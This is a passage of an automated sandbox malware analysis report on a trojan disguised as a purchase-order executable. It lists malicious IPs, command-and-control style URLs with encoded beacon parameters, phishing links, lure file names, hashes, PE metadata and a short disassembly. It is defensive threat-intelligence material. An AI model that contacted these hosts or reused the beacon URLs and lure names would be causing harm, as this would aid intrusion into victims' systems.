http://www.founder.com.cn/cn	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.fonts.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sakkal.com	explorer.exe, 00000002.00000000.250844104.0000000008B46000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browsehappy.com/	netsh.exe, 00000003.00000002.500404825.000000000419D000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
119.81.172.165	unknown	Singapore	36351	SOFTLAYERUS	true
160.153.136.3	unknown	United States	21501	GODADDY-AMSDE	true
45.194.171.26	unknown	Seychelles	134548	DXTL-HKDXTLTseungKwanOServiceHK	true
74.208.236.115	unknown	United States	8560	ONEANDONE-ASBrauerstrasse48DE	true
3.138.72.189	unknown	United States	16509	AMAZON-02US	false
168.206.180.179	unknown	South Africa	137951	CLAYERLIMITED-AS-APClayerLimitedHK	true
13.248.196.204	unknown	United States	16509	AMAZON-02US	true
35.246.6.109	unknown	United States	15169	GOOGLEUS	true
192.185.213.99	unknown	United States	46606	UNIFIEDLAYER-AS-1US	true
208.91.197.160	unknown	Virgin Islands (BRITISH)	40034	CONFLUENCE-NETWORK-INCVG	true
34.102.136.180	unknown	United States	15169	GOOGLEUS	true
54.208.77.124	unknown	United States	14618	AMAZON-AESUS	true
198.54.117.212	unknown	United States	22612	NAMECHEAP-NETUS	false

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	321387
Start date:	21.11.2020
Start time:	09:21:27
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 10s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	Purchase Order 40,7045.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	26
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@16/13
EGA Information:	Failed
HDC Information:	Successful, ratio: 66.3% (good quality ratio 61%) Quality average: 74.5% Quality standard deviation: 30.8%
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 104.43.139.144, 104.42.151.234, 104.79.90.110, 51.104.139.180, 168.61.161.212, 92.122.213.247, 92.122.213.194, 52.255.188.83, 20.54.26.129, 2.17.179.193, 84.53.167.113, 51.104.144.132 Excluded domains from analysis (whitelisted): fs.microsoft.com, arc.msn.com.nsatc.net, ris-prod.trafficmanager.net, tile-service.weather.microsoft.com, e1723.g.akamaiedge.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, wildcard.weather.microsoft.com.edgekey.net, blobcollector.events.data.trafficmanager.net, e1553.dspg.akamaiedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus16.cloudapp.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
119.81.172.165	n4uladudJS.exe	Get hash	malicious	Browse	www.hyx20140813.com/igqu/?p0D=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oB+gypqC9f0&6l8l=BXeD1
	NzI1oP5E74.exe	Get hash	malicious	Browse	www.hyx20140813.com/igqu/?v6=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47rt98ClSPciiEZyTMw==&1b=V6O83JaPw
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.hyx20140813.com/igqu/?Mjq8ijoX=j1Gd3/8+Zp+B40J0jTVmXVq6mMmQz5+yQk6aMNkaRX/kF+TSG97NiOE47oB+gypqC9f0&IR9D54=3fFxr
160.153.136.3	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.heartandcrowncloset.com/igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr
	ORDER INQUIRY.exe	Get hash	malicious	Browse	www.downrangedynamics.com/sbmh/?h0D0gtS=QG6cmKwMcbhETcnko+puOsCD9stVZ32FtoVbr4uUzPWakgG16h92aTsXPo0YCYJv4TJJ&uTix=M4Bx
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	www.heartandcrowncloset.com/igqu/?ETmlgT7=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iGn3vBS2J6G&VR-X4=02JPGJu85hqTpbBp
	feJbFA6woA.exe	Get hash	malicious	Browse	www.chaoscraftsonthesidellc.com/d8h/?-Z=VgunWFR7381Y5NWGD/38d+jgIlwl93I0dvoxY8yGiJGKvo5r5YPI2T7dv5eWqCC1MjOFhqEKjg==&r6o=X48HMfqH7
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	www.brokerltsas.com/o9b2/?J484=xPJtLXbX&u6u4=6x5F27wyHYr8GgLrkuNsYvvLt7juXQeGGQ7Slpy+Q4D6/zuDF42IIFTnet9Ba0T8GtN8
	2GYiwgv3lC.exe	Get hash	malicious	Browse	www.optimizedaerialsolutions.com/fs8/?TZ=ytxhuXp&ibCxDh0P=ZCSANr2Lr/VRrptdCT4IN/fC6b10Csi3VV6k/pbEGKamPkfOX7nbct0QZLcOAF6X7SCC2nJaJg==
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?uTuD=ApdlgZ4&D818=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWvvidmO8V/zJ
	new requests.exe	Get hash	malicious	Browse	www.sacredclouddesigns.com/z0po/?sBZDvF=9MFD902CRjS5NPhXEuMBG5caDPOCQJgZBYfZlD0RA04vaZnloH66SO9mEKFdDdxwzubDPs6+OQ==&ARcPqD=djI0xT_PbHmL
	Se adjunta un nuevo pedido.exe	Get hash	malicious	Browse	www.minnesotawake.com/nt8e/?ox=VTRxrjkh&EZ80Hj=MD9f73lkVY9ttkcsRgzqGQquxxJbdd8AweQFA3pAF/CGQqKK98tRanJxIGsyNlaGbA6Y
	ORDRE9047EAR.exe	Get hash	malicious	Browse	www.i-maskup.com/g456/?NDH=2XqyTqvBPYEIIQ7C9PAVi7ToTypX/ozp68wTg3jYycB3DE2cB1BMX6ZgHt7Os8vcES1k&ArEh=dfyt9vCHiJx8
	1vwiSWvK62.exe	Get hash	malicious	Browse	www.atlaslandscapingservice.com/v82/?D618=O2MXWxIP7&Ndd8=r1MbDlvRtNnYXHylJoDkE/Zy1Hst2l17um53rflA5XJ1CwWSYicUNmmfnm3UxTD1cZy8
	WhTpMNHuhn.exe	Get hash	malicious	Browse	www.virtualtutorconnect.com/m20/?9rjL72ap=WiCpxiB8QpbIcKCxYkVzQzexgFTRw3mhrZGlmrGLLA8Rla/GmPk3EFGlPgFmGvL/hkq9&r6q=X48xPNU8z
	qpFvMReV7S.exe	Get hash	malicious	Browse	www.joyfulexpressionsbykatie.com/d9s8/?t8o=AlaEwXleqSR/bS1JT5v4bzUIYzvxHkrwTelRk3wVEiQjzofty3VDsu5oN59qsmVAuf/qvMKWvQ==&Tj=YpIp
	MC4x7Wssfg.exe	Get hash	malicious	Browse	www.nullwavemusic.com/ndk/?AdUHSz=gdJtTVD0dJ&9r4l7=QIPIaMvS97e29ZRXzBRvaIimK9PlRyG4bDbzrzEQQm5A4X6Gg/7AQ6aZOB64vKIhtgVc
	PO8479349743085.exe	Get hash	malicious	Browse	www.chaoscraftsonthesidellc.com/d8h/?2dz=onrhc&-Z1hir=VgunWFR7381Y5NWGD/38d+jgIlwl93I0dvoxY8yGiJGKvo5r5YPI2T7dv5eWqCC1MjOFhqEKjg==
	HPScan Payment 20.10.20.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?bb=VVCli0QXPpBTAhY&iB=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWvvICW+8R97J
	ScanHP20.10.20.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?5j=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWvvICW+8R97J&uTdDF=LJBxm
	PROFORMA C20201009.exe	Get hash	malicious	Browse	www.homeadventurerealty.com/t4vo/?AdsdIhj=LXGq20/+zuzAtHn+RNkJy1lnwyb+Rzif3x6XQYTahMBJ/3fV9F5xeFEAcuc7lhD7gOgr&0rn=TN6xlffxOb
	Qaizen19.10.2020.exe	Get hash	malicious	Browse	www.atg.solar/dn87/?uV0xpr=FL6gZJ1XS/k0TAd4gBOcPNmGfgsOr0PNKpIcsncXgFwURx0MPWPmXTabWsPYN3uEPYSO&0r_4=vDKxhJ1xlHYTRvA
	SKM109482.exe	Get hash	malicious	Browse	www.dbcm55.com/xnc/?ohoDP=e9A9I+HG+ESpMZxG6Lb7UfG/SGO5r7TYdIsEenmLCF213fEn7xLYVgT7YONHChJyYVJu&1bj=3fb4M84hjHXXBp
45.194.171.26	9Ul8m9FQ47.exe	Get hash	malicious	Browse	www.chemtradent.com/igqu/?VR-X4=02JPGJu85hqTpbBp&ETmlgT7=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGkKev0TSo0+
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.chemtradent.com/igqu/?Ezu=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHGoKN/4QL40oV2qP0w==&Rzr=M6hL9XnpVlsp
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	www.chemtradent.com/igqu/?Mjq8ijoX=K/S7l+gZOJHSbd5nxE/i7D8w4PbP25DXYiwy4kAXmG/uB5hJOsw6W9LAHFEwO+UrIPV5&IR9D54=3fFxr

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
td-balancer-euw2-6-109.wixdns.net	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	35.246.6.109
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	35.246.6.109
	Invoice.exe	Get hash	malicious	Browse	35.246.6.109
	uM0FDMSqE2.exe	Get hash	malicious	Browse	35.246.6.109
	hjKM0s7CWW.exe	Get hash	malicious	Browse	35.246.6.109
	n4uladudJS.exe	Get hash	malicious	Browse	35.246.6.109
	T66DUJYHQE.exe	Get hash	malicious	Browse	35.246.6.109
	NzI1oP5E74.exe	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	MOI Support ship V2.docx	Get hash	malicious	Browse	35.246.6.109
	KYC-DOC-11-10.exe	Get hash	malicious	Browse	35.246.6.109
	f14QUITHh3.exe	Get hash	malicious	Browse	35.246.6.109
	00d1gI2vB4.exe	Get hash	malicious	Browse	35.246.6.109
	sXNQG9jqhR.exe	Get hash	malicious	Browse	35.246.6.109
	Additional Agreement 2020-KYC.exe	Get hash	malicious	Browse	35.246.6.109
	SOA109216.exe	Get hash	malicious	Browse	35.246.6.109
parkingpage.namecheap.com	Order List.xlsx	Get hash	malicious	Browse	198.54.117.216
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.215
	SHIPMENT DOCUMENT.xlsx	Get hash	malicious	Browse	198.54.117.217
	jrzlwOa0UC.exe	Get hash	malicious	Browse	198.54.117.211
	invoice No_SINI0068206497.exe	Get hash	malicious	Browse	198.54.117.215
	tbzcpAZnBK.exe	Get hash	malicious	Browse	198.54.117.212
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.212
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.212
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	198.54.117.212
	4Dm4XBD0J5.exe	Get hash	malicious	Browse	198.54.117.217
	yo0PRvEkB3.rtf	Get hash	malicious	Browse	198.54.117.216
	RSC22091236.exe	Get hash	malicious	Browse	198.54.117.212
	PI210941.exe	Get hash	malicious	Browse	198.54.117.215
	TF20279707040104.exe	Get hash	malicious	Browse	198.54.117.212
	Shipment Approval.exe	Get hash	malicious	Browse	198.54.117.216
	sSPA66WeL6.exe	Get hash	malicious	Browse	198.54.117.218
	PSJ21840.exe	Get hash	malicious	Browse	198.54.117.210
	NA_GRAPH.EXE	Get hash	malicious	Browse	198.54.117.217
	HussCrypted.exe	Get hash	malicious	Browse	198.54.117.215
	camscanner-011022020.exe	Get hash	malicious	Browse	198.54.117.212
www.cashintl.com	Purchase Order 40,7045.exe	Get hash	malicious	Browse	54.208.77.124
	T66DUJYHQE.exe	Get hash	malicious	Browse	54.208.77.124
	sXNQG9jqhR.exe	Get hash	malicious	Browse	54.208.77.124
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	54.208.77.124

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DXTL-HKDXTLTseungKwanOServiceHK	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	154.86.218.70
	Order specs19.11.20.exe	Get hash	malicious	Browse	154.86.212.132
	INQUIRY.exe	Get hash	malicious	Browse	154.219.198.139
	PO0119-1620 LQSB 0320 Siemens.exe	Get hash	malicious	Browse	185.238.225.15
	moses.exe	Get hash	malicious	Browse	154.214.81.76
	H4hs204fyj.exe	Get hash	malicious	Browse	45.203.105.90
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	45.194.171.26
	feJbFA6woA.exe	Get hash	malicious	Browse	154.214.156.184
	Bonifico n.1101202910070714.exe	Get hash	malicious	Browse	154.80.149.76
	kvdYhqN3Nh.exe	Get hash	malicious	Browse	175.29.246.111
	tbzcpAZnBK.exe	Get hash	malicious	Browse	154.219.112.132
	w4fNtjZBEH.exe	Get hash	malicious	Browse	154.85.232.76
	ORDER LIST.exe	Get hash	malicious	Browse	154.84.82.67
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	45.194.171.26
	rvNT4kv6bg.exe	Get hash	malicious	Browse	154.214.142.220
	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	45.194.171.26
	ORDER SPECIFICATIONS.exe	Get hash	malicious	Browse	43.255.109.79
	PSJ21840.exe	Get hash	malicious	Browse	154.219.112.132
	HussCrypted.exe	Get hash	malicious	Browse	154.84.86.29
	#Uc720#Ud2f0#Uc544#Uc774#Ud14c#Ud06c-#Ubc1c#Uc8fc#Uc11c #Uc1a1#Ubd80#Uc758#Uac74.exe.exe	Get hash	malicious	Browse	45.203.120.102
SOFTLAYERUS	http://s1022.t.en25.com/e/er?s=1022&lid=2184&elqTrackId=BEDFF87609C7D9DEAD041308DD8FFFB8&lb_email=bkirwer%40farbestfoods.com&elq=b095bd096fb54161953a2cf8316b5d13&elqaid=3115&elqat=1	Get hash	malicious	Browse	169.50.137.176
	http://septterror.tripod.com/the911basics.html	Get hash	malicious	Browse	169.50.137.190
	dde1df2ac5845a19823cabe182fcd870.exe	Get hash	malicious	Browse	50.23.197.94
	https://variationnotice.carrd.co/	Get hash	malicious	Browse	75.126.175.140
	https://mrsklzspproject.us-south.cf.appdomain.cloud/redirect/?email=david.termondt@zultys.com	Get hash	malicious	Browse	169.47.124.25
	https://11d1b1a708d345629044c3ad40d1ecce.svc.dynamics.com/t/r/u-pVz1saxqvYoENC2gfNyfmqxmRTA6ywUgXOHYh5EPA#aurore@idcom-france.com:3Tk39002=4000	Get hash	malicious	Browse	169.46.89.154
	https://www.women.com/alexa/quiz-dialect-test	Get hash	malicious	Browse	159.253.128.188
	http://tinyurl.com	Get hash	malicious	Browse	159.253.128.188
	http://static.publicocdn.com	Get hash	malicious	Browse	159.253.128.183
	LnzGySrnuh.exe	Get hash	malicious	Browse	169.50.76.149
	K4LBgqdSZB.exe	Get hash	malicious	Browse	43.226.229.43
	BbQr9AZ6nv.exe	Get hash	malicious	Browse	169.45.3.11
	oV4bV6Uj6g.exe	Get hash	malicious	Browse	169.61.11.75
	n4uladudJS.exe	Get hash	malicious	Browse	119.81.172.165
	http://googledrive-eu.com	Get hash	malicious	Browse	173.192.101.21
	https://cloudsrvs.eu-gb.mybluemix.net/&p2=http:/ww.voicemailnote/#Andy.Hamman@crowe.co.uk	Get hash	malicious	Browse	141.125.73.154
	Y7i2sl4Foh.exe	Get hash	malicious	Browse	50.23.197.94
	NzI1oP5E74.exe	Get hash	malicious	Browse	119.81.172.165
	https://meetingwithmd.eu-gb.cf.appdomain.cloud/redirect/?email=info@voegtle.de	Get hash	malicious	Browse	158.175.115.200
	https://mp3-youtube.download/fr/secure-audio-converter	Get hash	malicious	Browse	173.192.101.24
GODADDY-AMSDE	Purchase Order 40,7045$.exe	Get hash	malicious	Browse	160.153.136.3
	ORDER INQUIRY.exe	Get hash	malicious	Browse	160.153.136.3
	DEBIT NOTE DB-1130.exe	Get hash	malicious	Browse	160.153.128.7
	esm-Fichero-ES.msi	Get hash	malicious	Browse	160.153.143.165
	eLaaw7SqMi.exe	Get hash	malicious	Browse	160.153.136.3
	9Ul8m9FQ47.exe	Get hash	malicious	Browse	160.153.136.3
	dB7XQuemMc.exe	Get hash	malicious	Browse	160.153.128.3
	feJbFA6woA.exe	Get hash	malicious	Browse	160.153.136.3
	PPO040963RG02.exe	Get hash	malicious	Browse	160.153.18.187
	COMMERCIAL INVOICE BILL OF LADING DOC.exe	Get hash	malicious	Browse	160.153.136.3
	w4fNtjZBEH.exe	Get hash	malicious	Browse	160.153.129.28
	ORDER LIST.exe	Get hash	malicious	Browse	160.153.128.7
	#U306b#U4fee 2020-09-19.doc	Get hash	malicious	Browse	160.153.252.3
	2GYiwgv3lC.exe	Get hash	malicious	Browse	160.153.136.3
	H4A2-423-EM154-302.exe	Get hash	malicious	Browse	160.153.138.219
	https://www.stafftrainingsolutions.co.uk/STICK/PageUpdated/ampt.html?app=adviserinfo@uesp.org&subdomain=http://uesp.org	Get hash	malicious	Browse	160.153.162.141
	new requests.exe	Get hash	malicious	Browse	160.153.136.3
	http://www.4413044130.stormletpet.com./UEt1c3RAc29mdHNvdXJjZS5jby5ueg==#aHR0cHM6Ly9vaGlzLm5nL29mZmljZS9vZjI/L1BLdXN0QHNvZnRzb3VyY2UuY28ubno=	Get hash	malicious	Browse	160.153.131.204
	http://crm.time4you.de/sugarcrm/custom/ch1/1.html	Get hash	malicious	Browse	160.153.133.145
	index.html.doc	Get hash	malicious	Browse	160.153.138.219

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.407144975942058
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Purchase Order 40,7045.exe
File size:	347136
MD5:	2566aac2faf57e27d8778f2c61bac6d3
SHA1:	b163ec807fe59a0f85f2d964fe1e8ffa8adab77e
SHA256:	7d4d5ddf016f84445c94bf5ee4d715be092f8711b70ebd17f48f2956fba0487d
SHA512:	f4e1fabcb5036f7adda5789f91dfdcfeada6dbfb0c8ed33ff76acf7d42f8f0e74041332684310572bd449b23ec5a7f10ef25245f78007fa70a10c14d646c6250
SSDEEP:	6144:UO3eKE9waM2lOA8IOvHPHO1tOmxiMuCY3Ua0d0feBBK10r2GYy08:veKE9wLaOLhHPH83EMlarfk2GY6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(k-.l.C.l.C.l.C..\|..{.C..\|..Z.C..\|....C.er..c.C.l.B...C..\|..m.C..\|..m.C..\|..m.C.Richl.C.........................PE..L......_...

File Icon


Icon Hash:	34ecc4d0f0e8ccd4

Static PE Info

General
Entrypoint:	0x40af48
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB8ABA9 [Sat Nov 21 05:54:49 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fe91cd96af1348223f21fb3d7bcc19bd

Entrypoint Preview

Instruction
call 00007F7A188004C2h
jmp 00007F7A187F8F1Eh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
xor ecx, ecx
cmp eax, dword ptr [004253E0h+ecx*8]
je 00007F7A187F90A5h
inc ecx
cmp ecx, 2Dh
jc 00007F7A187F9083h
lea ecx, dword ptr [eax-13h]
cmp ecx, 11h
jnbe 00007F7A187F90A0h
push 0000000Dh
pop eax
pop ebp
ret
mov eax, dword ptr [004253E4h+ecx*8]
pop ebp
ret
add eax, FFFFFF44h
push 0000000Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 08h
pop ebp
ret
call 00007F7A187FECD5h
test eax, eax
jne 00007F7A187F9098h
mov eax, 00425548h
ret
add eax, 08h
ret
call 00007F7A187FECC2h
test eax, eax
jne 00007F7A187F9098h
mov eax, 0042554Ch
ret
add eax, 0Ch
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
call 00007F7A187F9077h
mov ecx, dword ptr [ebp+08h]
push ecx
mov dword ptr [eax], ecx
call 00007F7A187F9017h
pop ecx
mov esi, eax
call 00007F7A187F9051h
mov dword ptr [eax], esi
pop esi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 4Ch
mov eax, dword ptr [00425810h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
xor ebx, ebx
push esi
mov esi, dword ptr [ebp+08h]
push edi
mov dword ptr [ebp-2Ch], ebx
mov dword ptr [ebp-1Ch], ebx
mov dword ptr [ebp-20h], ebx
mov dword ptr [ebp-28h], ebx
mov dword ptr [ebp-24h], ebx
mov dword ptr [ebp-4Ch], esi
mov dword ptr [ebp-48h], ebx
cmp dword ptr [esi+14h], ebx

Rich Headers

Programming Language:

[LNK] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x23cb0	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2c000	0x42e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31000	0x1624	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1f000	0x1c8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1d3b7	0x1d400	False	0.554295205662	data	6.66141080101	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x1f000	0x5734	0x5800	False	0.364657315341	data	4.99118455339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x25000	0x6880	0x3800	False	0.69580078125	data	6.63430076237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2c000	0x42e0	0x4400	False	0.0521599264706	data	2.2997665352	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x31000	0x213e	0x2200	False	0.525735294118	data	5.09060810438	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2c0a0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 57599, next used block 4294967040	English	United States
RT_GROUP_ICON	0x302c8	0x14	data	English	United States

Imports

DLL	Import
KERNEL32.dll	WaitForSingleObject, GetExitCodeProcess, HeapReAlloc, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, CreateProcessA, CloseHandle, SetFilePointer, ReadFile, FlushFileBuffers, GetConsoleMode, GetConsoleCP, HeapSize, IsValidCodePage, GetOEMCP, GetACP, GetStringTypeW, WriteConsoleW, SetStdHandle, CompareStringW, SetEnvironmentVariableA, GetUserDefaultLCID, VirtualProtect, WideCharToMultiByte, InterlockedIncrement, InterlockedDecrement, InterlockedExchange, MultiByteToWideChar, EncodePointer, DecodePointer, Sleep, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetLastError, HeapFree, GetProcAddress, GetModuleHandleW, ExitProcess, GetCommandLineW, HeapSetInformation, GetStartupInfoW, GetCPInfo, RaiseException, RtlUnwind, HeapAlloc, LCMapStringW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, IsProcessorFeaturePresent, HeapCreate, GetFileAttributesA, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InitializeCriticalSectionAndSpinCount, LoadLibraryW, GetLocaleInfoW, WriteFile, GetStdHandle, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, CreateFileW
MSVFW32.dll	ICGetInfo, ICSeqCompressFrameStart, ICCompressorChoose, ICSeqCompressFrame
AVIFIL32.dll	AVIMakeStreamFromClipboard, AVIClearClipboard, AVIStreamOpenFromFile, AVIStreamRead
wsnmp32.dll
SETUPAPI.dll	SetupDiCreateDeviceInterfaceRegKeyA, SetupDiInstallClassExA, SetupDiEnumDriverInfoW, SetupDiBuildDriverInfoList, SetupRenameErrorA, SetupDefaultQueueCallback, SetupInstallFilesFromInfSectionA
SHELL32.dll	SHFileOperationA, ShellHookProc, DragQueryFile
